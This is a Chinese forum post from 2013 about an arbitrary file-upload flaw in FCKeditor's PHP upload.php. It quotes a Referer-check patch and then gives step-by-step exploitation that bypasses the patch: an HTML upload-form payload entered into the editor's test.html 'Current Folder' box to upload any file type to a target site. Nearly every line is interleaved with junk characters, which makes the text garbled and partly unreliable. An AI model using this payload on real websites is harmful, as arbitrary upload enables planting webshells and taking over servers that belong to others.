漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
3 R Y$ D& x8 b! [. [! } A+ ?网上给出的修复方案是; z6 a' b) \) F: T* o2 a" k2 y
修复方法,删除FCK编辑器用其他的编辑器
* l8 M/ s' G1 n2 ~6 F5 t C& c或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
! b f0 r1 E/ w3 @/ A8 ]在7 `* ]( B: [' c M1 K' l( F2 C
require(‘config.php’);
; c& k0 h4 S. T% \require(‘util.php’);
6 n' y: g9 y) R, D9 a2 _1 y- b的下面添加以下代码—————————–; @: p4 E) ? x" f9 h7 z! B$ X
//防止外部提交
) _! Y7 R+ B( g+ ofunction outsidepost(); u0 o+ H8 m% Z0 h. p; ?; B
{
( O) z+ v6 U- z8 s# f! d$servername=$_SERVER['SERVER_NAME'];, N" Q6 D" t$ [7 n1 X& B
$sub_from=@$_SERVER['HTTP_REFERER'];. Z% g7 ?& o* q$ A( _
$sub_len=strlen($servername);( m @% }# f3 h/ R
$checkfrom=substr($sub_from,7,$sub_len);
; N2 ]8 L' u% }: ^if($checkfrom!=$servername){8 `5 z9 M# o! s3 D8 i) K
echo(“you don’t outsidepost!”);' q* y) B( b0 V0 |/ |; t
exit;% V- D W0 g; J# T6 U% [. `; S' O
}/ [: w: c# R7 i1 V( s$ B
}
3 T9 a+ f) ~$ ]1 C% P( g8 i: U6 v: qoutsidepost();
: }' F8 ~: H3 A" r0 c# I! ?: c+ w防止外部提交,但是没有防止内部提交,
4 F' `5 M- z) C& z; ?利用方法:
+ Y9 a G/ {/ _8 j0 \1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 `9 R2 G* p2 A& r2,在Current Folder 框输入
9 M" P _. Y H# S2 Z& K& ^9 i<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
G$ Q! L2 G! {3 K然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。) _, l9 D1 A& }* l6 c6 }% f4 Y
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对